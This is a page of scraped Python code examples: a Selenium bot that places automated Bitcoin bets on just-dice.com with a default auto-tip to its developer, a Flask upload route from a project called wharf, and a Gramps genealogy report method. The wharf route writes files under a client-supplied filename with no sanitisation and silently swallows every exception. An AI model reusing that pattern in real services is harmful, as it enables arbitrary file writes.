        self.lose_rounds = self.get_conf_int("lose_rounds", -1)
        self.chance = self.get_conf("chance", "") #self.get_conf_float("chance", -1.0)
        self.multiplier = self.get_conf("multiplier", "")
        self.safe_perc = self.get_conf_float("safe_perc", 0.0)
        self.autotip = self.get_conf_float("auto-tip", 1)
        self.min_bet = self.get_conf_float('min_bet', 1e-8)
        self.simulate = self.get_conf_int("simulate", -1)
        self.simulate_showevery = 1
        self.wait_loses = self.get_conf_int("wait_loses", 0)
        self.wait_chance= self.get_conf_float("wait_chance", 50.0)
        self.wait_bet   = self.get_conf_float("wait_bet", 1e-08)
        self.hi_lo      = self.get_conf("hi_lo", 'random')
        
        #luck %
        luck_estim = 0.0    #counting all luck we should have 
        luck_lucky = 0.0    #counting real luck
        
        #debug options:
        self.slow_bet = self.get_conf_int('slow_bet', 0)
        self.debug_issue_21 = self.get_conf('debug_issue_21', 0)
        
        #test settings
        if self.user=="":
            print "you need to specify a user name. See config.py"
            sys.exit(1)
        if self.password=="":
            print "you need to specify a password. See config.py"
            sys.exit(2)
        if not (0 <= self.visible <= 1):
            print "visible could be 1 or 0. See config.py"
            self.visible = 1
        if self.lose_rounds <= 0:
            print "lose_rounds must be a number > 0. See config.py"
            sys.exit(3)
        if not self.chance:
            print "a chance must be defined. See config.py"
            sys.exit(4)
        if not self.multiplier:
            print "a multiplyer must be defined. See config.py"
            sys.exit(5)
        if not (0.0 <= self.safe_perc < 100.0):
            print "safe_perc must be greater 0 and below 100. See config.py"
            sys.exit(6)
        if not (0.0 <= self.autotip <= 50.0): 
            print "auto-tip could be anything between 0 and 50 %. See config.py"
            self.autotip=50.0
        if not (0 <= self.slow_bet <= 1):
            print "slow_bet could be 1 or 0."
            self.slow_bet = 1
        if not (-1 <= self.simulate):
            print "simulate -1 for no simulaton, 0 for simulation, higher int for less luck in %. See config.py"
            self.simulate = -1 #live play default
            
        #do we accept a lose somewhere?
        self.maxlose_perc = 100.0 #we will lose all if we need to play more rounds as excpected.
        if type(self.multiplier) is list:
            last = self.multiplier[-1]
            if type(last) is str:
                if last.lower().startswith('lose'):
                    #check params:
                    if self.lose_rounds != len(self.multiplier):
                        print "you are using 'loseX' syntax in multiplyer, lose_rounds must match played rounds."
                        sys.exit(23)
                    try:
                        self.maxlose_perc = float(self.multiplier[-1][4:])
                    except:
                        print "multiplier error, loseX must be a number"
                        sys.exit(7)
                    if not 0.0 < self.maxlose_perc <= 100.0:
                        print "multiplyer: loseX must be greater 0 and below 100. See config.py"
                        sys.exit(8)
        
        #internal vars
        self.balance = 0.0
        self.safe_balance = 0.0
        self.total = 0.0
        self.max_lose = 0.0
        self.most_rows_lost = 0
        lost_sum = 0.0
        lost_rows = 0
        self.show_funds_warning = True
        self.loses_waited = 0
        saldo = 0.0
        self.bet_hi = random.randint(0,1) #random start needed for some hi/lo-modes
        
        #simulating?
        if self.simulate==-1:
            log_fn = "bets.log"
            graph_fn = "bets.png"
            #not simulating:
            self.remote_impl = JustDice_impl()
            banner = " playing on just-dice.com with real btc "
        else:
            log_fn = "bets-simulating.log"
            graph_fn = "bets-simulating.png"
            self.remote_impl = Simulate_impl( luck=self.simulate )
            banner = " fast, random simulating with 100btc (like %) "
        print
        print "#"*10 + banner + "#"*10
        time.sleep(3)
        
        global logHandler
        global logFormatter
        global logger
        logHandler = TimedRotatingFileHandler(log_fn, when="midnight")
        logFormatter = logging.Formatter('%(asctime)s, %(levelname)s: %(message)s')
        logHandler.setFormatter( logFormatter )
        logger = logging.getLogger( 'MyLogger' )
        logger.addHandler( logHandler )
        logger.setLevel( logging.INFO )
        
        #temporary database
        self.db = sqlite3.connect('', isolation_level=None,
                                  detect_types=sqlite3.PARSE_DECLTYPES) #we want an temporary file based database
        self.db.execute("""
                CREATE TABLE IF NOT EXISTS bets
                    (dt TIMESTAMP, balance REAL);
                """)
        
        print
        print "Set up selenium (this will take a while, be patient) ..."
        self.setUp()
        print "Login (still be patient) ..."
        self.do_login()
        #empty stdin buffer
        for cmd in get_stdin():
            pass
        self.help()
        
        config_no_credentials = jdb_config
        config_no_credentials["user"] = '*'
        config_no_credentials["pass"] = '*'
        logger.info("starting with config: %s" % (repr(config_no_credentials),) )
        
        print "Start betting ..."
        self.starttime = datetime.utcnow()
        self.betcount  = 0
        #start betting
        bet = self.get_max_bet()
        self.run = True
        lost_rows = 0
        self.starting_balance = self.balance
        self.lowest_balance = self.balance
        self.highest_balance = self.balance
        while self.run:
            #import pydevd; pydevd.settrace('127.0.0.1')
            #bet
            try:
                warn = ''
                #prepare bet
                if self.loses_waited < self.wait_loses:
                    #waiting bet
                    chance = self.wait_chance
                    self.betcount += 1
                    bet = self.wait_bet
                else:
                    chance = self.get_chance(lost_rows)
                    self.betcount += 1
                    bet = self.get_rounded_bet(bet, chance)
                #are we below safe-balance? STOP
                if (self.balance - bet) < self.safe_balance:
                    print "STOPPING, we would get below safe percentage in this round!"
                    print "safe_perc: %s%%, balance: %s, safe balance: %s" % (
                                  self.safe_perc, 
                                  "%+.8f" % self.balance,
                                  "%+.8f" % self.safe_balance)
                    self.run = False
                else:
                    #hi/lo strategy
                    if   self.hi_lo == 'random':
                        self.bet_hi = random.randint(0,1)
                    elif self.hi_lo == 'always_hi':
                        self.bet_hi = True
                    elif self.hi_lo == 'always_lo':
                        self.bet_hi = False
                    elif self.hi_lo == 'switch_on_win':
                        if saldo > 0.0:
                            self.bet_hi = not self.bet_hi
                    else:
                        raise Exception("hi_lo config option isn't implemented")
                    
                    #BET BET BET
                    saldo = self.do_bet(chance=chance, bet=bet, bet_hi=self.bet_hi)
                    #luck stats estimate
                    luck_estim += chance
                    if saldo > 0.0:
                        #win
                        bet = self.get_max_bet()
                        
                        #stats about losing
                        lost_sum = 0.0
                        lost_rows = 0
                        #luck stats - won
                        luck_lucky += 100.0
                        
                        #reset waited lost bets:
                        self.loses_waited = 0
                    else:
                        #lose:
                        
                        #are we waiting for lost bets?
                        if self.loses_waited < self.wait_loses:
                            self.loses_waited += 1
                            if self.loses_waited >= self.wait_loses:
                                bet = self.get_max_bet()
                                lost_rows = 0
                        else:
                            #lose, multiplyer for next round:
                            multi = self.get_multiplyer(lost_rows)
                            if multi == 'lose':
                                warn += ", we lose"
                                bet = self.get_max_bet()
                                lost_rows = 0
                            else:
                                bet = bet*multi
                                #next rounds vars
                                lost_rows += 1
                                lost_sum += saldo
                    
                    #add win/lose:
                    self.total += saldo
                    #warnings:
                    sim_show_warn = False
                    if lost_sum < self.max_lose:   #numbers are negative
                        self.max_lose = lost_sum
                        warn += ', max lost: %s' % ("%+.8f" % self.max_lose,)
                    if lost_rows > self.most_rows_lost:
                        self.most_rows_lost = lost_rows
                        warn += ', max rows: %s' % (self.most_rows_lost,)
                        sim_show_warn = True
                    
                    #total in 24 hours
                    now = datetime.utcnow()
                    difftime = (now-self.starttime)
                    day_sec = 24*60*60
                    difftime_sec = difftime.days*day_sec + difftime.seconds
                    win_24h = self.total*day_sec/difftime_sec
                    win_24h_percent = win_24h/self.balance*100
                    
                    #lowest/highest balance:
                    #self.starting_balance
                    if self.balance < self.lowest_balance:
                        self.lowest_balance = self.balance
                    if self.balance > self.highest_balance:
                        self.highest_balance = self.balance
                    
                    self.db.execute("""
                        INSERT INTO bets
                            VALUES (?, ?);
                        """, (now, self.balance) )
                    
                    bet_info = "%s%%luck round%s|B%s/%s: %s%s %s (%s%%) = %s total. session: %s (%s(%s%%)/d)%s" % (
                                       "%+6.1f" % (luck_lucky/luck_estim*100-100),
                                       "%3i"     % lost_rows,
                                       "%6i"     % self.betcount,
                                       str(difftime).split('.')[0],
                                       "%+.8f"   % saldo, 
                                       "-h" if (self.bet_hi) else "-l",
                                       "+++" if (saldo>=0) else "---",
                                       "%04.1f"  % chance,
                                       "%0.8f"   % self.balance,
                                       "%+.8f"   % self.total,
                                       "%+.8f"   % win_24h,   #will be more as starting bet should raise
                                       "%+06.1f" % win_24h_percent,
                                       warn)
                    # when simulating print only every 100th bet info + bet's with warnings:
                    if self.simulate == -1:
                        print bet_info
                        logger.info(bet_info)
                    elif sim_show_warn:
                        print bet_info
                        logger.info(bet_info)
                    elif self.betcount % self.simulate_showevery == 0:
                        print bet_info
                        logger.info(bet_info)
                        
                    #graphing
                    if self.simulate == -1:
                        graph_every = 1 #not simulating, every bet
                    else:
                        graph_every = 1000
                    
                    if self.betcount % graph_every == 0:
                        c = self.db.execute("""
                                    SELECT dt, balance 
                                    FROM bets;""")
                        data = c.fetchall()
                        if not data == None:
                            data_dt = []; data_bal = [];
                            for dt, bal in data:
                                data_dt.append(dt)
                                data_bal.append(bal)
                            #graph
                            fig    = Figure()
                            canvas = FigureCanvas(fig)
                            ax = fig.add_subplot(111)
                            fig.autofmt_xdate(bottom=0.2, rotation=30, ha='right')
                            ax.set_xlabel('Time', fontsize=10)
                            ax.set_ylabel('BTC', fontsize=10)
                            ax.plot(data_dt, data_bal, '-', color='r', label='balance')
                            #legend
                            handles, labels = ax.get_legend_handles_labels()
                            ax.legend(handles, labels, loc=2)
                            ax.grid(True)
                            #re-write files
                            if os.path.exists(graph_fn):
                                    os.unlink(graph_fn)
                            canvas.print_figure(graph_fn)
                            
                    
                    #read command line
                    #while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
                    #    cmd = sys.stdin.readline().rstrip('\n')
                    for cmd in get_stdin():
                        if   cmd.lower() in ['q','quit','exit']:
                            #quit
                            self.run = False
                        elif cmd.lower() in ['h','?','help']:
                            self.help()
                        elif cmd.lower().startswith('s'):
                            if cmd[1:]: #set
                                try:
                                    sp = int(cmd[1:])
                                    if sp<=100 and sp>=0:
                                        self.safe_perc = sp
                                        self.safe_balance = 0.0
                                        l = "resetting safe_perc, new value from now on: %s%%" % (sp,)
                                        print l
                                        logger.info(l)
                                except ValueError:
                                    print "command '%s' failed, keeping old safe_perc" % (cmd,)
                            else: #get
                                print "safe_perc is set to %s%%, which is currently %s" % (
                                               self.safe_perc, "%0.8f" % self.safe_balance)
                        elif cmd.lower().startswith('r'):
                            if cmd[1:]: #set
                                if self.maxlose_perc != 100:
                                    print "setting lose_rounds is disabled, incompatible with your multiplyer setting."
                                else:
                                    try:
                                        r = int(cmd[1:])
                                        if r>=0:
                                            self.lose_rounds = r
                                            l = "setting lose_rounds to: %s" % (r,)
                                            print l
                                            logger.info(l)
                                    except ValueError:
                                        print "command '%s' failed, keeping old lose_rounds" % (cmd,)
                            else: #get
                                print "lose_rounds is set to %s" % (self.lose_rounds,)
                        else:
                            print "command '%s' not found." % (cmd,)
                            self.help()
            except KeyboardInterrupt:
                self.run = False
            except Exception as e:
                print "Exception %s, retrying..." % (e,)
                print traceback.format_exc()
            
        #all bets done (with 'while True' this will never happen)
        print
        print "Starting balance     : %s" % ("%+.8f" % self.starting_balance,)
        print "Lowest   balance     : %s" % ("%+.8f" % self.lowest_balance,)
        print "Highest  balance     : %s" % ("%+.8f" % self.highest_balance,)
        print "Longest losing streak: %s rows" % (self.most_rows_lost,)
        print "Most expensive streak: %s" % ("%+.8f" % self.max_lose,)
        print 
        
        if self.total > 0.0:
            tip = (self.total/100*self.autotip) - 0.0001 #tip excluding fee.
            print "Congratulations, you won %s since %s (this session)" % (
                       "%+.8f" % self.total, 
                       str(difftime).split('.')[0] )
            if self.autotip==0:
                if not tip <= 0.0:
                    print "Why not tip 1%% = %s to the developer? 1CDjWb7zupTfQihc6sMeDvPmUHkfeMhC83\nYou may also set 'auto-tip' in config.py. \nThanks!" % (
                              "%+.8f" % (self.total/100*1) )
            elif tip <= 0.0:
                print "You are using auto-tip feature, thanks. This time tip is too low because of fee's."
            else:
                print "You are using auto-tip feature, thanks. I would tip %s to the developer." % (
                           "%+.8f" % tip )
                s = 10
                for cmd in get_stdin(): #empty stdin
                    pass
                print "If you want to cancel the tip, press Enter in next %ss. Also read documentation on auto-tip." % (s,)
                cancel = False
                for x in range(0,s):
                    try: 
                        get_stdin().next()
                        cancel = True
                        break
                    except StopIteration:
                        pass
                    time.sleep(1)
                if cancel:
                    #cmd = sys.stdin.readline().rstrip('\n')
                    print "You decided to cancel my tip. You could also help the project by recommending it somewhere!\nShare this link: https://github.com/KgBC/just-dice-bot"
                else:
                    print "Starting auto-tip ..."
                    ret = self.do_autotip(tip)
                    if '1CDjWb7zupTfQihc6sMeDvPmUHkfeMhC83' in ret:
                        print "You auto-tip'ed. Thanks for your support! king regards, KgBC https://github.com/KgBC/just-dice-bot"
                    else:
                        print "Auto-tip failed, \nError from just-dice: %s\nPlease tip manually: 1CDjWb7zupTfQihc6sMeDvPmUHkfeMhC83" % (
                                       ret,)
        else:
            print "You lost %s since %s (this session)\nYou know, it's betting, so losing is normal.\nYou may want to take less risk, see README: https://github.com/KgBC/just-dice-bot \nIf settings are unclear just file an issue on GitHub. I'll help. Thanks." % (
                       "%+.8f" % self.total, 
                       str(difftime).split('.')[0] )
        print
        print "Shutting down..."
        self.tearDown()

Example 127

Project: wharf
Source File: forms.py
View license
@app.route('/forms', methods=['POST'])
def forms():
    try:
        filename = request.json['filename']
        url = request.json['url']
        services = request.json['services']
        i = 0
        j = 0
        if filename:
            file_ext1 = filename.rsplit('.', 1)[1]
            file_ext2 = filename.rsplit('.', 2)[1]
            if file_ext1 == "zip":
                j = move_services(filename, j, 1)
            elif file_ext1 == "gz":
                j = move_services(filename, j, 2)

            missing_files = request.json['missing_files']
            if j == 0:
                j = ""
            service_path = app.config['SERVICES_FOLDER']+file_ext1+str(j)
            service_path2 = app.config['SERVICES_FOLDER']+file_ext2+str(j)
            if "description" in missing_files:
                description = ""
                try:
                    description = request.json['description']
                except:
                    pass
                if file_ext1 == "zip":
                    with open(service_path+"/"+app.config['SERVICE_DICT']['description'], 'w') as f:
                        f.write(description)
                elif file_ext1 == "gz":
                    with open(service_path2+"/"+app.config['SERVICE_DICT']['description'], 'w') as f:
                        f.write(description)
            if "client" in missing_files:
                client = ""
                clientLanguage = ""
                clientFilename = "dummy.txt"
                try:
                    client = request.json['client']
                    clientLanguage = request.json['clientLanguage']
                    clientFilename = request.json['clientFilename']
                except:
                    pass
                if file_ext1 == "zip":
                    if not path.exists(service_path+"/client"):
                        mkdir(service_path+"/client")
                    with open(service_path+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                        f.write(clientLanguage+"\n")
                        f.write(clientFilename)
                    with open(service_path+"/client/"+clientFilename, 'w') as f:
                        f.write(client)
                elif file_ext1 == "gz":
                    if not path.exists(service_path2+"/client"):
                        mkdir(service_path2+"/client")
                    with open(service_path2+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                        f.write(clientLanguage+"\n")
                        f.write(clientFilename)
                    with open(service_path2+"/client/"+clientFilename, 'w') as f:
                        f.write(client)
            if "about" in missing_files:
                missing_metadata(j, filename, "about")
            if "body" in missing_files:
                missing_metadata(j, filename, "body")
            if "link" in missing_files:
                link = "#"
                linkName = "None"
                try:
                    link = request.json['link']
                    linkName = request.json['linkName']
                except:
                    pass
                if file_ext1 == "zip":
                    if not path.exists(service_path+"/html"):
                        mkdir(service_path+"/html")
                    with open(service_path+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                        f.write(link+" "+linkName)
                elif file_ext1 == "gz":
                    if not path.exists(service_path2+"/html"):
                        mkdir(service_path2+"/html")
                    with open(service_path2+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                        f.write(link+" "+linkName)
        elif url:
            j_array = []
            if not "." in url or not "git" in url:
                # docker index
                j = 0
                j_array.append(j)
            elif url.rsplit('.', 1)[1] == "git":
                # move to services folder
                i = 0
                # keeps track of the number of the service (if there is more than one)
                j = 0
                try:
                    services = services.replace('&#39;', "'")
                    services = [ item.encode('ascii') for item in literal_eval(services) ]
                except:
                    pass
                service_path = path.join(app.config['UPLOAD_FOLDER'], (url.rsplit('/', 1)[1]).rsplit('.', 1)[0])
                if not services:
                    return render_template("failed.html")
                elif len(services) == 1:
                    while i != -1:
                        try:
                            if i == 0:
                                mv(service_path, app.config['SERVICES_FOLDER'])
                            elif i == 1:
                                mv(service_path, service_path+str(i))
                                mv(service_path+str(i), app.config['SERVICES_FOLDER'])
                            else:
                                mv(service_path+str(i-1), service_path+str(i))
                                mv(service_path+str(i), app.config['SERVICES_FOLDER'])
                            j = i
                            i = -1
                        except:
                            i += 1
                    try:
                        # remove leftover files in tmp
                        rmdir(service_path)
                    except:
                        pass
                else:
                    for service in services:
                        i = 0
                        while i != -1:
                            try:
                                if i == 0:
                                    mv(path.join(service_path, service),
                                       app.config['SERVICES_FOLDER'])
                                elif i == 1:
                                    mv(path.join(service_path, service),
                                       path.join(service_path, service+str(i)))
                                    mv(path.join(service_path, service+str(i)),
                                       app.config['SERVICES_FOLDER'])
                                else:
                                    mv(path.join(service_path, service+str(i-1)),
                                       path.join(service_path, service+str(i)))
                                    mv(path.join(service_path, service+str(i)),
                                       app.config['SERVICES_FOLDER'])
                                j = i
                                i = -1
                            except:
                                i += 1
                        j_array.append(j)
                    try:
                        # remove leftover files in tmp
                        rmtree(service_path)
                    except:
                        pass
                # !! TODO
                # array of services
                # return array of missing files, empty slots for ones that don't need replacing
                # eventually allow this for file upload as well
                # something different is git repo versus docker index
                # can all git repos be handled the same, or are there ones that might be different?
            try:
                services = services.replace('&#39;', "'")
                services = [item.encode('ascii') for item in literal_eval(services)]
            except:
                pass
            if len(services) > 1:
                counter = 0
                for service in services:
                    # update missing_files for array of them,
                    # similarly with description, client, about, body, link, etc.
                    missing_files = request.json['missing_files']
                    if j_array[counter] == 0:
                        j_array[counter] = ""
                    index_service = service.replace("/", "-")
                    meta_path = app.config['SERVICES_FOLDER']+index_service+str(j_array[counter])
                    description_meta(missing_files, counter, url, meta_path)
                    if "client" in missing_files:
                        client = ""
                        clientLanguage = ""
                        clientFilename = "dummy.txt"
                        try:
                            client = request.json['client'+str(counter)]
                            clientLanguage = request.json['clientLanguage'+str(counter)]
                            clientFilename = request.json['clientFilename'+str(counter)]
                        except:
                            pass
                        # if url is docker index
                        if not "." in url or not "git" in url:
                            if not path.exists(meta_path):
                                mkdir(meta_path)
                        if not "." in url or not "git" in url or url.rsplit('.', 1)[1] == "git":
                            if not path.exists(meta_path+"/client"):
                                mkdir(meta_path+"/client")
                            with open(meta_path+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                                f.write(clientLanguage+"\n")
                                f.write(clientFilename)
                            with open(meta_path+"/client/"+clientFilename, 'w') as f:
                                f.write(client)
                    if "about" in missing_files:
                        missing_metadata3(counter, j_array, url, index_service, service, "about")
                    if "body" in missing_files:
                        missing_metadata3(counter, j_array, url, index_service, service, "body")
                    if "link" in missing_files:
                        link = "#"
                        linkName = "None"
                        try:
                            link = request.json['link'+str(counter)]
                            linkName = request.json['linkName'+str(counter)]
                        except:
                            pass
                        # if url is docker index
                        if not "." in url or not "git" in url:
                            if not path.exists(meta_path):
                                mkdir(meta_path)
                        if not "." in url or not "git" in url or url.rsplit('.', 1)[1] == "git":
                            if not path.exists(meta_path+"/html"):
                                mkdir(meta_path+"/html")
                            with open(meta_path+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                                f.write(link+" "+linkName)
                    counter += 1
            else:
                missing_files = request.json['missing_files']
                if j == 0:
                    j = ""
                index_service = services[0].replace("/", "-")
                meta_path = app.config['SERVICES_FOLDER']+index_service+str(j)
                meta_path2 = app.config['SERVICES_FOLDER']+(url.rsplit('/', 1)[1]).rsplit('.', 1)[0]+str(j)
                description_meta(missing_files, "", url, meta_path)
                if "client" in missing_files:
                    client = ""
                    clientLanguage = ""
                    clientFilename = "dummy.txt"
                    try:
                        client = request.json['client']
                        clientLanguage = request.json['clientLanguage']
                        clientFilename = request.json['clientFilename']
                    except:
                        pass
                    # if url is docker index
                    if not "." in url or not "git" in url:
                        if not path.exists(meta_path):
                            mkdir(meta_path)
                        if not path.exists(meta_path+"/client"):
                            mkdir(meta_path+"/client")
                        with open(meta_path+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                            f.write(clientLanguage+"\n")
                            f.write(clientFilename)
                        with open(meta_path+"/client/"+clientFilename, 'w') as f:
                            f.write(client)
                    elif url.rsplit('.', 1)[1] == "git":
                        if not path.exists(meta_path2+"/client"):
                            mkdir(meta_path2+"/client")
                        with open(meta_path2+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                            f.write(clientLanguage+"\n")
                            f.write(clientFilename)
                        with open(meta_path2+"/client/"+clientFilename, 'w') as f:
                            f.write(client)
                if "about" in missing_files:
                    missing_metadata2(j, url, index_service, services, 'about')
                if "body" in missing_files:
                    missing_metadata2(j, url, index_service, services, 'body')
                if "link" in missing_files:
                    link = "#"
                    linkName = "None"
                    try:
                        link = request.json['link']
                        linkName = request.json['linkName']
                    except:
                        pass
                    # if url is docker index
                    if not "." in url or not "git" in url:
                        if not path.exists(meta_path):
                            mkdir(meta_path)
                        if not path.exists(meta_path+"/html"):
                            mkdir(meta_path+"/html")
                        with open(meta_path+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                            f.write(link+" "+linkName)
                    elif url.rsplit('.', 1)[1] == "git":
                        if not path.exists(meta_path2+"/html"):
                            mkdir(meta_path2+"/html")
                        with open(meta_path2+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                            f.write(link+" "+linkName)
    except:
        pass
    return jsonify(url=app.config['DOMAIN'])

Example 128

Project: addons-source
Source File: PersonEverything.py
View license
    def print_object(self, level, o):

        if issubclass(o.__class__, gramps.gen.lib.address.Address):
            # Details of address are printed by the subclass conditions,
            # primarily by LocationBase, because address is a subclass of
            # LocationBase
            pass

        if issubclass(o.__class__, gramps.gen.lib.addressbase.AddressBase):
            for address in o.get_address_list():
                self.print_header(level, _("Address"), ref=address)
                self.print_object(level+1, address)

        if isinstance(o, gramps.gen.lib.Attribute):
            # The unique information about attributes (the type) is printed by
            # AttributeBase
            pass

        if issubclass(o.__class__, gramps.gen.lib.attrbase.AttributeBase):
            for attribute in o.get_attribute_list():
                self.print_header(level, _("Attribute")+". ",
                                  type_desc=str(attribute.get_type()),
                                  obj_type=attribute.get_value(),
                                  privacy=attribute.get_privacy(),
                                  ref=attribute)
                self.print_object(level+1, attribute)

        if isinstance(o, gramps.gen.lib.ChildRef):
            # The unique information about ChildRef (the father relation and
            # mother relation) is printed by the main write_report function
            pass

        if issubclass(o.__class__, gramps.gen.lib.citationbase.CitationBase):
            if self.print_citations:
                self.print_header(level, "CitationBase tbd")

                for citation_handle in o.get_citation_list():
                    citation = self.database.get_citation_from_handle(
                                                            citation_handle)
                    self.print_object(level+1, citation)

        if isinstance(o, gramps.gen.lib.Citation):
            # the unique information about Citation (the page) is printed by the
            # bibliography code. The other unique information, the confidence is
            # printed here
            if o.get_confidence_level() != gramps.gen.lib.Citation.CONF_NORMAL:
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Confidence") + " : ")
                self.doc.end_bold()
                self.doc.write_text(conf_strings.get(o.get_confidence_level(),
                                                     _('Unknown')))
                self.doc.end_paragraph()

            if self.print_citations:
                source_handle = o.get_reference_handle()
                source = self.database.get_source_from_handle(source_handle)
                self.print_object(level+1, source)

        if issubclass(o.__class__, gramps.gen.lib.datebase.DateBase):
            if o.get_date_object() and not o.get_date_object().is_empty():
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Date") + " : ")
                self.doc.end_bold()
                self.doc.write_text(displayer.display(o.get_date_object()))
                self.doc.end_paragraph()

        if isinstance(o, gramps.gen.lib.Event):
            # The event type is printed by the main write_report function
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Description") + " : ")
            self.doc.end_bold()
            self.doc.write_text(str(o.get_description()))
            self.doc.end_paragraph()

        if issubclass(o.__class__, gramps.gen.lib.eventref.EventRef):
            # The unique information about EventRef (the EventRoleType) is
            # printed by the main write_report function
            event = self.database.get_event_from_handle(o.get_reference_handle())
            self.print_header(level, _("Event"), event.get_gramps_id(),
                              _("Event type"), str(event.get_type()),
                              event.get_privacy(),
                              ref=event)
            self.print_object(level+1, event)

        if isinstance(o, gramps.gen.lib.Family):
            # The unique information about Family (father, mother and children,
            # FamilyRelType and event references) are printed by the main
            # write_report function
            pass

        if isinstance(o, gramps.gen.lib.LdsOrd):
            # The Ordinance type is printed by LdsOrdBase
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Temple and status") + " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((TEMPLES.name(o.get_temple()),
                                           o.status2str()
                                   )))
            self.doc.end_paragraph()

            f_h = o.get_family_handle()
            if f_h:
                family = self.database.get_family_from_handle(f_h)
                self.print_family_summary(level+1, family,
                                          _("LDS Ordinance family"))

        if issubclass(o.__class__, gramps.gen.lib.ldsordbase.LdsOrdBase):
            for ldsord in o.get_lds_ord_list():
                self.print_header(level, _("LDS "),
                                  type_desc=_("Ordinance"),
                                  obj_type=ldsord.type2str(),
                                  privacy=ldsord.get_privacy(),
                                  ref=ldsord)
                self.print_object(level+1, ldsord)

        if isinstance(o, gramps.gen.lib.Location):
            # The unique information about location (Parish) is printed by
            # Place. Location otherwise serves as a pointer to a LocationBase
            # object
            pass

        if issubclass(o.__class__, gramps.gen.lib.locationbase.LocationBase):
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Street, City, County, State, Postal Code, "
                                  "Country, Phone number") + " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((o.get_street(),
                                            o.get_city(),
                                            o.get_county(),
                                            o.get_state(),
                                            o.get_postal_code(),
                                            o.get_country(),
                                            o.get_phone())))
            self.doc.end_paragraph()

        if issubclass(o.__class__, gramps.gen.lib.mediabase.MediaBase):
            for mediaref in o.get_media_list():
                self.print_header(level, _("Media Reference"), ref=mediaref)
                self.print_object(level+1, mediaref)

        if isinstance(o, gramps.gen.lib.Media):
            # thumb is not printed. The mime type is printed by MediaRef
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Description and Path") + " : ")
            self.doc.end_bold()
            self.doc.write_text(o.get_description() + ", ")
            path = o.get_path()
            if path:
                mark = IndexMark("file://:" +
                                 media_path_full(self.database, path),
                                 LOCAL_HYPERLINK)
                self.doc.write_text(path, mark=mark)
            self.doc.end_paragraph()

            mime_type = o.get_mime_type()
            if mime_type and mime_type.startswith("image"):
                filename = media_path_full(self.database, o.get_path())
                if os.path.exists(filename):
                    self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                    self.doc.add_media(filename, "single", 4.0, 4.0)
                    self.doc.end_paragraph()
                else:
                    self._user.warn(_("Could not add photo to page"),
                          "%s: %s" % (filename, _('File does not exist')))

        if isinstance(o, gramps.gen.lib.MediaRef):
            media_handle = o.get_reference_handle()
            media = self.database.get_media_from_handle(media_handle)

            if o.get_rectangle():
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Referenced Region") + " : ")
                self.doc.end_bold()
                self.doc.write_text(", ".join((("%d" % i) for i in o.get_rectangle())))
                self.doc.end_paragraph()

                mime_type = media.get_mime_type()
                if mime_type and mime_type.startswith("image"):
                    filename = media_path_full(self.database,
                                               media.get_path())
                    if os.path.exists(filename):
                        self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                        self.doc.add_media(filename, "single", 4.0, 4.0,
                                                  crop=o.get_rectangle()
                                                  )
                        self.doc.end_paragraph()

            desc = get_description(media.get_mime_type())
            if not desc:
                desc = _("unknown")
            self.print_header(level, _("Media Object"),
                              media.get_gramps_id(),
                              _("Mime type"),
                              desc,
                              media.get_privacy(),
                              ref=media)
            self.print_object(level+1, media)

        if isinstance(o, gramps.gen.lib.Name):
            # group_as, sort_as and display_as are not printed. NameType is
            # printed by the main write_report function
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Given name(s): Title, Given, Suffix, "
                                  "Call Name, Nick Name, Family Nick Name") +
                                  " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((o.get_title(),
                                           o.get_first_name(),
                                           o.get_suffix(),
                                           o.get_call_name(),
                                           o.get_nick_name(),
                                           o.get_family_nick_name())))
            self.doc.end_paragraph()

        if isinstance(o, gramps.gen.lib.Note):
            # The NoteType is printed by NoteBase. Whether the note is flowed or
            # not is not printed, but affects the way the note appears
            self.doc.write_styled_note(o.get_styledtext(),
                                       o.get_format(),
                                       "PE-Level%d" % min(level, 32),
                                       contains_html = o.get_type()
                                        == gramps.gen.lib.notetype.NoteType.HTML_CODE
                                      )

        if issubclass(o.__class__, gramps.gen.lib.notebase.NoteBase):
            for n_h in o.get_note_list():
                note = self.database.get_note_from_handle(n_h)
                self.print_header(level, _("Note"), note.get_gramps_id(),
                                  _("Note type"), str(note.get_type()),
                                  note.get_privacy())
                self.print_object(level+1, note)

        if issubclass(o.__class__, gramps.gen.lib.Person):
            # This is printed by the main write-report function
            pass

        if isinstance(o, gramps.gen.lib.Place):
            # The title, name, type, code and lat/long are printed by PlaceBase
            for placeref in o.get_placeref_list():
                self.print_header(level, _("Parent Place"))
                self.print_object(level+1, placeref)

#            location = o.get_main_location()
#            if location.get_parish():
#                self.print_header(level, _("Main Location"),
#                                  type_desc=_("Parish"),
#                                  obj_type=location.get_parish())
#            else:
#                self.print_header(level, _("Main Location"))
#
#            self.print_object(level+1, location)
#
            for location in o.get_alternate_locations():
                if location.get_parish():
                    self.print_header(level, _("Alternate Location"),
                                      type_desc=_("Parish"),
                                      obj_type=location.get_parish())
                else:
                    self.print_header(level, _("Alternate Location"))
